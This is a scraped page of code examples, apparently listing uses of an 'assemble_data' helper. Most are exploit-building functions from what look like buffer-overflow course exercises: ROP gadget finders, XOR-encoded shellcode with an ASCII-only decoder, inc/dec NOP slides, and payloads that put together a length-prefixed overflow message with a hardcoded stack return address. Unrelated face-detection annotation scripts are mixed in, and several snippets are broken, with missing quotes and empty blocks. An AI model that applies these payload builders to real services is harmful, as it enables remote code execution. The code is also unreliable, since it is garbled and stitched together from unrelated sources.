def find_all(self, gadget):
        Return all the addresses of the gadget inside the memory dump.

            self.find_all('POP eax')
            => < all ABSOLUTE addresses in memory of 'POP eax; RET' >
        # Notes:
        # 1. Addresses are ABSOLUTE (for example, 0x08403214), NOT RELATIVE to
        #    the beginning of the file (for example, 12).
        # 2. Don't forget to add the 'RET'.
        wordToFind = assemble.assemble_data(gadget+"; RET")
        find = True
        address = -1
        first = 0
        while find:
            address = self.dump.find(wordToFind,(address + 1))#)*first)
            if(first == 0):
                first = 1
            if address == -1:
                find = False
            absAddress = self.start_addr + address
            yield hex(absAddress)[:-1]
Example #2
def get_shellcode():
    '''This function returns the machine code (bytes) of the shellcode.

    This does not include the size, return address, nop slide or anything else!
    From this function you should return only the shellcode!
    q2_shellcode = get_raw_shellcode()
    shellcode_length = len(
        q2_shellcode)  # shellcode length doesn't change after
    encoded_shellcode, indices = encode(q2_shellcode)
    decoder_shellcode = get_decoder(indices)
    # print len(decoder_shellcode)
    # print shellcode_length

    init_to_esp = "push esp; pop eax;"  # init eax as esp value
    sub_eax = "dec eax;" * (
        shellcode_length + 4
    )  # subtract from esp shellcode length + 4 bytes of RET
    # after these two lines eax should contains the value 0xbfffe0e1 which is the beginnig of the shellcode
    init_eax = init_to_esp + sub_eax
    init_eax_assm = assemble.assemble_data(init_eax)
    total_shellcode = init_eax_assm + decoder_shellcode + encoded_shellcode
    # print [hex(struct.unpack("B", b)[0]) for b in init_eax_assm]
    return total_shellcode
Example #3
    def find_all(self, gadget):
        Return all the addresses of the gadget inside the memory dump.

            self.find_all('POP eax')
            => < all ABSOLUTE addresses in memory of 'POP eax; RET' >
        # Notes:
        # 1. Addresses are ABSOLUTE (for example, 0x08403214), NOT RELATIVE to the
        #    beginning of the file (for example, 12).
        # 2. Don't forget to add the 'RET'
        opcode = assemble.assemble_data(gadget + '; RET')
        import re
        data = self.dump
        start = self.start_addr
        indices = []  #will be there all indexed of substring opcode in data
        index = 0
        while (index < len(data)):  #find all substring equals opcode to data
            index = data.find(opcode, index)
            if index == -1:
            index += len(opcode)
        address_list = []
        for index in indices:
            address = start + index
            address_list.append('%08x' % address)
            #print('%08x' % address)
        return address_list
Example #4
    def find_all(self, gadget):
        Return all the addresses of the gadget inside the memory dump.

            self.find_all('POP eax')
            => < all ABSOLUTE addresses in memory of 'POP eax; RET' >
        # Notes:
        # 1. Addresses are ABSOLUTE (for example, 0x08403214), NOT RELATIVE to the
        #    beginning of the file (for example, 12).
        # 2. Don't forget to add the 'RET'
        addresses = []
        offset = 0
        gadget_opcodes = assemble.assemble_data(gadget + '; RET')
        with open(self.path, "rw+b") as lib_c:
            #string = read(lib_c)
            #offset = string.find(gadget_opcodes, offset)
            memmap = mmap.mmap(lib_c.fileno(), 0)
            offset = memmap.find(gadget_opcodes, offset)
            while (offset != -1):
                addresses.append( + offset)
                offset = memmap.find(gadget_opcodes, offset + 1)
                # offset = string.find(gadget_opcodes, offset+1)

        return addresses
Example #5
def get_nop_slide(number_of_nops):
    #creating the "nop" slide made of inc ecx & dec ecx
    data = 'inc esi\ndec esi\n' * (number_of_nops / 2)
    if (number_of_nops % 2 != 0):
        #if the length of the nop slide is odd add one mroe inc ecx
        data = data + 'inc esi\n'
    nop_slide = assemble.assemble_data(data)
    return nop_slide
Example #6
def get_payload():
    buf_len = 1040
    # our return address
    addr = chr(0x78) + chr(0xde) + chr(0xff) + chr(0xbf)
    # get encoded shellcode and create list of positions of bytes to xor
    shellcode = get_shellcode()
    # list of decoder instructions
    instructions = []
    # put offset to shellcode in eax
    instructions.append('push esp')
    instructions.append('pop eax')
    instructions.append('add eax, 0x50005000')
    instructions.append('sub eax, 0x50005100')
    # now eax has esp-256
    for i in range(0x100 - len(shellcode) - 4):
        instructions.append('inc eax')
    # init ebx
    instructions.append('xor ebx, ebx')
    # create mask 0xff and put in ebx
    instructions.append('dec ebx')
    last = 0
    for b in bytes_to_xor:
        diff = b - last
        for i in range(diff):
            instructions.append('inc eax')
        instructions.append('xor byte ptr [eax], bl')
        last = b
    decoder = ''.join((inst + '\n') for inst in instructions)
    asm_decoder = assemble.assemble_data(decoder)
    # make a multiple of 4
    nop_len = 4 * ((buf_len - len(asm_decoder) - len(shellcode)) // 4)
    # our nop is of length 2 thats why we need to divide by 2
    # create nop ascii alternative, increment and decrement
    ascii_nop = assemble.assemble_data('inc ebx\ndec ebx')
    nop_slide = ascii_nop * (nop_len // 2)
    # suffix padding, between the end of the shell code and
    padding_len = buf_len - len(shellcode) - len(asm_decoder) - nop_len
    # problem can occur if length of padding is odd because our nop is of
    # length 2
    padding = 'p' * padding_len
    message = ''.join([nop_slide, asm_decoder, shellcode, padding, addr])
    payload = network_order_uint32(len(message)) + message
    return payload
Example #7
def get_payload():
    buf_len = 1040
    # our return address
    addr = chr(0x78) + chr(0xde) + chr(0xff) + chr(0xbf)
    # get encoded shellcode and create list of positions of bytes to xor
    shellcode = get_shellcode()
    # list of decoder instructions
    instructions = []
    # put offset to shellcode in eax
    instructions.append('push esp')
    instructions.append('pop eax')
    # now eax has esp
    for i in range(len(shellcode) + 4):
        instructions.append('dec eax')
    # init ebx
    instructions.append('push 0')
    instructions.append('pop ebx')
    # create mask 0xff and put in ebx
    instructions.append('dec ebx')
    last = 0
    for b in bytes_to_xor:
        diff = b - last
        for i in range(diff):
            instructions.append('inc eax')
        instructions.append('xor byte ptr [eax], bl')
        last = b
    decoder = ''.join((inst + '\n') for inst in instructions)
    asm_decoder = assemble.assemble_data(decoder)
    # make a multiple of 4
    nop_len = buf_len - len(asm_decoder) - len(shellcode)
    # our nop is of length 2 thats why we need to divide by 2
    # create nop ascii alternative, increment and decrement
    nop_slide = ''
    # if nop slide length is odd, we add one byte nop
    if (nop_len % 2 != 0):
        nop_slide += assemble.assemble_data('inc ebx\n')
        nop_len -= 1
    ascii_nop = assemble.assemble_data('inc ebx\ndec ebx')
    nop_slide += ascii_nop * (nop_len // 2)
    # suffix padding, between the end of the shell code and
    message = ''.join([nop_slide, asm_decoder, shellcode, addr])
    payload = network_order_uint32(len(message)) + message
    # print(len(payload))
    return payload
Example #8
 def find_all(self, gadget):
     # open dump file
     dump_file = open(self.dump_path, 'r')
     # put contents of file in dump
     dump =
     dump = assemble.assemble_data('inc eax; ret')
     dump += assemble.assemble_data('inc ebx')
     dump += assemble.assemble_data('inc ecx; ret')
     # construct gadget with ret which we want to search
     gadget_asm = assemble.assemble_data(gadget + '; ret')
     positions = []
     # construct list with all positions relative to start addr of gadget
     index = 0
     while (index < len(dump)):
         index = dump.find(gadget_asm, index)
         if index == -1:
         positions.append(self.start_addr + index)
         index += len(gadget_asm)
     # close file
     return positions
Example #9
def get_payload():
    totalMsgLen = 1040  # not including return address
    addr = chr(0x78) + chr(0xde) + chr(0xff) + chr(0xbf)
    shellcode = get_shellcode()
    nop = assemble.assemble_data("nop")
    nopLen = totalMsgLen - len(shellcode)
    nopSlide = nop * nopLen
    # suffix padding, between the end of the shell code and
    # our return address
    paddingLen = totalMsgLen - len(shellcode) - nopLen
    padding = nop * paddingLen
    message = ''.join([nopSlide, shellcode, padding, addr])
    payload = network_order_uint32(len(message)) + message
    return payload
Example #10
def get_decoder(length, pos):
    # push esp
    # pop eax ;eax now holds the end address of the encoded shellcode
    # dec eax ;|shellcode| + 4 times
    # push 0
    # pop ebx
    # dec ebx
    # inc eax ;pos[i] times where i is the ith encoded byte
    # xor byte ptr [eax], bl ; repeat |shellcode| times
    data = 'push esp\npop eax\n' + 'dec eax\n' * 4 + 'push 0\npop ebx\ndec ebx\n' + 'dec eax\n' * length
    for i in range(len(pos)):
        data = data + 'inc eax\n' * (pos[i]) + 'xor byte ptr [eax], bl\n'
    decoder = assemble.assemble_data(data)
    return decoder
    def find_all(self, gadget):
        Return all the addresses of the gadget inside the memory dump.

            self.find_all('POP eax')
            => < all ABSOLUTE addresses in memory of 'POP eax; RET' >
        # Notes:
        # 1. Addresses are ABSOLUTE (for example, 0x08403214), NOT RELATIVE to
        #    the beginning of the file (for example, 12).
        # 2. Don't forget to add the 'RET'.
        opcode = assemble.assemble_data(gadget + '; RET')
        indices = [i for i in self.find_all_helper(opcode, self.dump)]
        return [self.start_addr + index for index in indices]
Example #12
def get_decoder(indices):
    '''Return the assembled decoder code.'''
    create_ff = "push 0; pop ebx; dec ebx;"  # insert into ebx the value ff with only ascii chars
    init_edx = "push 0; pop edx;"  # initiate edx to zero
    decoder_assembly = create_ff + init_edx

    current_value = 0
    for i in indices:
        index_diff = i - current_value  # this is how much we should increment edx for current i vaule
        inc = "inc eax;" * index_diff  # do as much increment as needed
        xr = "xor byte ptr [eax], BL;"  # then, perform the decoding
        decoder_assembly += inc + xr  # update our decoder code
        current_value += index_diff  # update current edx value

    decoder = assemble.assemble_data(decoder_assembly)  # assemble our code
    return decoder
Example #13
def assemble_pnet_anno_files(cfg, mode='train'):
    net_size = config.MODEL.PNET_SIZE

    pnet_postive_file = os.path.join(cfg.DATA.mtcnn_anno_path, 'pos_{}_{}.txt'.format(net_size, mode))
    pnet_part_file = os.path.join(cfg.DATA.mtcnn_anno_path, 'part_{}_{}.txt'.format(net_size, mode))
    pnet_neg_file = os.path.join(cfg.DATA.mtcnn_anno_path, 'neg_{}_{}.txt'.format(net_size, mode))
    imglist_filename = os.path.join(cfg.DATA.mtcnn_anno_path, 'imglist_anno_{}_{}.txt'.format(net_size, mode))

    anno_list = []

    # anno_list.append(pnet_landmark_file)

    chose_count = assemble.assemble_data(imglist_filename, anno_list)
    print("PNet train annotation result file path:%s" % imglist_filename)
    def find_all(self, gadget):
        Return all the addresses of the gadget inside the memory dump.

            self.find_all('POP eax')
            => < all ABSOLUTE addresses in memory of 'POP eax; RET' >
        # Notes:
        # 1. Addresses are ABSOLUTE (for example, 0x08403214), NOT RELATIVE to
        #    the beginning of the file (for example, 12).
        # 2. Don't forget to add the 'RET'.
        haystack = self.dump
        needle = assemble.assemble_data(gadget + '\nret')
        return find_indexes(needle, haystack, self.start_addr)
Example #15
def get_payload():
    '''This function returns the data to send over the socket to the server.
    This includes everything - the 4 bytes for size, the nop slide, the
    shellcode and the return address.
    total_size = 1040  #Size of the payload not including the first 4 bytes
    shellcode = get_shellcode()

    number_of_nops = total_size - len(
        shellcode)  #Calculate the size of the nop slide
    ra = 0xbfffde0e + int(
        number_of_nops / 2
    )  #land in the middle of nopslide, for testing on debug used static vlaue of 0xbfffde0e + 450 = 0xbfffdfd0
    nop_slide = 'nop\n' * (number_of_nops)  #creating the nop slide
    payload = assemble.assemble_data(nop_slide) + shellcode + str(
        struct.pack('<L', ra))
    return str(struct.pack('>L', len(payload))) + payload
Example #16
    def find_all(self, gadget):
        Return all the addresses of the gadget inside the memory dump.

            self.find_all('POP eax')
            => < all ABSOLUTE addresses in memory of 'POP eax; RET' >
        # Notes:
        # 1. Addresses are ABSOLUTE (for example, 0x08403214), NOT RELATIVE to
        #    the beginning of the file (for example, 12).
        # 2. Don't forget to add the 'RET'.

        gadget_with_ret = gadget + '; RET'
        assembled_gadget = assemble.assemble_data(gadget_with_ret) # tranform to bytes from the assembly code

        # use re moudle to search in the dump file. add the offset to base address to get absolut addresses
        gadget_addresses = [hex(g.start() + self.start_addr)[:-1] for g in re.finditer(re.escape(assembled_gadget), self.dump)]

        return gadget_addresses
import os
import config
import assemble as assemble

if __name__ == '__main__':

    anno_list = []

    # pnet_landmark_file = os.path.join(config.ANNO_STORE_DIR,config.RNET_LANDMARK_ANNO_FILENAME)
    pnet_postive_file = os.path.join(config.ANNO_STORE_DIR,
    pnet_part_file = os.path.join(config.ANNO_STORE_DIR,
    pnet_neg_file = os.path.join(config.ANNO_STORE_DIR,

    # anno_list.append(pnet_landmark_file)

    imglist_filename = config.RNET_TRAIN_IMGLIST_FILENAME
    anno_dir = config.ANNO_STORE_DIR
    imglist_file = os.path.join(anno_dir, imglist_filename)

    chose_count = assemble.assemble_data(imglist_file, anno_list)
    print "PNet train annotation result file path:%s" % imglist_file
Example #18



	imglist_filename = config.PNET_TRAIN_IMGLIST_FILENAME
	anno_dir = config.ANNO_STORE_DIR
	imglist_file = os.path.join(anno_dir, imglist_filename)

	imglist_filename_test = config.PNET_TRAIN_IMGLIST_FILENAME_TEST
	anno_dir_test = config.ANNO_STORE_DIR
	imglist_file_test = os.path.join(anno_dir, imglist_filename_test)

	imglist_filename_val = config.PNET_TRAIN_IMGLIST_FILENAME_VALID
	anno_dir_val = config.ANNO_STORE_DIR
	imglist_file_val = os.path.join(anno_dir, imglist_filename_val)

	chose_count = assemble.assemble_data(imglist_file, anno_list)
	chose_count_test = assemble.assemble_data(imglist_file_test, anno_list_test)
	chose_count_val = assemble.assemble_data(imglist_file_val, anno_list_val)

	print('PNet train annotation result file path: {}'.format(imglist_file))
	print('PNet test annotation result file path: {}'.format(imglist_file_test))
	print('PNet valid annotation result file path: {}'.format(imglist_file_val))